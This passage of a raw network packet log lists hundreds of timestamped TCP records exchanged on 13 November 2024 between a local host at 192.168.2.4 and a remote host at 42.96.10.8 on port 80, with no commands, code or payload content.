                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127495050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127506971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127536058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.127542019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131520987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131557941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131560087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131571054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131602049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131773949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131820917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131830931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131858110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131887913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131897926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131907940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131917953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131927967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131932020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.131958961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132246017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132257938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132267952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132287025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132375002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132385969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132395983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132407904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132422924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132443905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132525921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132535934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132541895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132551908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132561922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132566929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132570982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132572889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132580996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132611036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132632971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132643938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132653952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132663965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132667065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132674932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132685900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132692099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132698059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132714987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132729053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132796049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132806063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132814884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132824898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132836103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132837057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132848024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132858038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132863045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132870913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132873058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132893085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132904053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132906914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132917881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132929087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132934093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132939100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.132957935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133073092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133116007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133179903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133192062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133209944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133219004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133220911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133239031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133250952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133255959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133263111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133272886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133284092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133285999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133295059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133409023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133418083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133428097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133449078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133469105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133472919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133483887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133510113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133513927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133524895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133548021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133560896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133570910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133580923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133610010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133640051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133651018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133662939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133677006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133683920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133687973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133698940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133718967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133754015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133764982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133790016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133872032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133888960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133898973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133915901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133927107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133934021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133938074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133951902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133960962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133964062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133975029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.133975983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134007931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134125948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134136915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134147882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134157896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134162903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134175062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134176970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134217978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134248018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134258032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134268045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134278059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134289026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134296894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134315014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134341002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134351969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134363890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134383917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134398937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134470940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134481907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134490967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134510040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134576082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134586096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134596109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134605885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134607077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134622097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134627104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134645939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134658098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134661913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134720087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134732008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134737968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134742022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134752989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134762049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134764910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134774923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134785891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134800911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134850025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134928942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134938955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134984970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134985924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.134999037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135009050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135020018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135020018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135030031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135039091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135066032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135099888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135112047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135121107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135132074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135142088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135142088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135160923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135220051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135231018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135240078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135248899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135267019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135267973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135277033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135287046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135289907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135301113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135302067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135319948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135324955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135348082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135354996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135359049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135390043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135481119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135493040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135510921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135520935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135530949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135530949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.135571003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175241947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175263882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175280094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175286055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175316095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175345898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175357103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175365925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175384045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175621033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175658941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175678015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175688028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175697088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175712109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175718069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175798893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175806999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175817966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175833941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175872087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175882101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.175909996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176007986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176018953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176028013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176035881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176045895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176054001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176058054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176078081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176172018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176182985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176192045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176213980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176229954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176259995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176269054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176274061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176314116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176357985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176368952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176377058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176404953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176419973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176753998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176799059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176808119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.176836967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.207829952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.207885981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208067894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208082914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208091021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208100080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208115101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208115101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208127022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208137035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208144903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208146095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208158016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208159924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208167076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208175898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208184958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208184958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208198071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208208084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208216906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208229065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208229065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208236933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208240986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208260059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208267927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.208276033 CET4973380192.168.2.442.96.10.8
